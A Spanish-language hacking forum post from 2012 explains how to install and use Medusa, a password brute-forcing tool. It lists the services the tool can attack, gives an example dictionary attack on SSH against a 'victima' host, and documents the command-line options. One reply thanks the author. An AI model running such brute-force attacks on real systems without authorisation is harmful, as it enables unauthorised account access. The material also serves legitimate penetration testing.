comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Medusa

  • 1 Respuestas
  • 2563 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« en: Julio 07, 2012, 11:54:12 am »

Lo instalaremos en Ubuntu:

1. abre la terminal y teclea esto.

Código: Bash
  1. sudo apt-get install medusa

no tienes que descargas libretas ni nada, todo ya viene con Ubuntu y en las ultimas versiones de Linux

2. para abrir o ejecutar medusa teclea esto en una terminal.

Código: Bash
  1. medusa

Con medusa puedes crackear por diccionario de una manera muy rápida los siguientes servicios.

Código: Text
  1. AFP
  2. CVS
  3. FTP
  4. HTTP
  5. IMAP
  6. MS-SQL
  7. MySQL
  8. NetWare NCP
  9. NNTP
  10. PcAnywhere
  11. POP3
  12. PostgreSQL
  13. REXEC
  14. RLOGIN
  15. RSH
  16. SMBNT
  17. SMTP-AUTH
  18. SMTP-VRFY
  19. SNMP
  20. SSHv2
  21. Subversion (SVN)
  22. Telnet
  23. VMware autenticacion Daemon (vmauthd)
  24. VNC
  25. Generico Wrapper

Como usar medusa: teclea en una terminal :

madusa -d

Con este comando pudieron ver los modulos adecuados a los cuales podemos atacar.

La sintaxis de una ataque normal seria así.

Código: Bash
  1. medusa -h www.victima.com -u usuario -P /home/stuxnet/crack_passwords.txt -M ssh -f

Donde esta -h No tienes permisos para ver links. Registrate o Entra con tu cuenta es el host o ip de la victima: -h 127.0.0.1, ahora la siguiente parte ? -u usuario? puede variar por que si tu te sabes el usuario simplemente colocas ?-u usuario? ahora si tambi?n intentas crackear el nombre de usuario hay tendr?a que ir la ruta del diccionario, ?-u /home/d14m4t3/crack_de_nombres_de_usuario.txt? recuerda, cambia la ruta ala tuya, ahora el siguiente paso, ?-P /home/d14m4nt3/crack_passwords.txt? es donde va a ir la ruta del diccionario de password, si tu te supieras la pass simplemente colocarias ?-P tupassword? seria raro que intentaras atacar por fuerza bruta y te supieras el pass y no el nombre de usuario jejeje.. ahora biene la ultima parte, ?-M ssh? este es el modulo al cual intentamos atacar, lo puedes reemplazar segun tu caso, telnet, ftp, ssh, HTTP, MySQL, MS-SQL.. etc.

parametros:

Código: Text
  1. -h -> el host victima
  2. -v -> modo verbose (mas informacion level de 0 a 6 siendo el 6 mas alto)
  3. -H -> si tenemos un archivo txt con una lista de hosts
  4. -u -> el usuario al cual deseamos hacerle el cracking
  5. -U -> un archivo txt con la lista de posibles usuarios (muy util si no sabemos que usuarios existen en el sistema)
  6. -P -> Ubicacion del diccionario
  7. -O -> Crea un archivo log
  8. - e ns -> Verifica el password vacio o que ambos datos sean lo mismo
  9. -M -> El modulo que deseamos emplear (sin la extension .mod)
  10. -n -> por si el servicio esta corriendo en otro puerto diferente al default
  11. -s -> Habilita ssl
  12. -f -> detiene el ataque en el instante de encontrar un password valido
  13. -b -> suprime los banners
« Última modificación: Noviembre 11, 2014, 09:41:36 am por ANTRAX »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Comandante Linux

  • *
  • Underc0der
  • Mensajes: 175
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://comandante-linux.blogspot.com/
    • Email
« Respuesta #1 en: Septiembre 23, 2012, 10:28:20 am »
Gracias por aportar, herramienta muy útil para algunos casos.
Saludos.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!